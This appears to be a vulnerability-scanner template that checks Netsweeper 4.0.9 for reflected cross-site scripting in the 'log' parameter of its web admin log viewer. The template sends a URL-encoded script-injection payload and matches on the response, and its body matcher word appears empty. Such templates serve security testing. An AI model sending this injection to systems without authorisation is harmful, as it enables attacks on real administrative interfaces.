id: netsweeper-rxss info: name: Netsweeper 4.0.9 - Cross Site Scripting Injection author: daffainfo severity: medium reference: https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz tags: netsweeper,xss requests: - method: GET path: - '{{BaseURL}}/webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter=' matchers-condition: and matchers: - type: word part: body words: - '' - type: word part: header words: - text/html - type: status status: - 200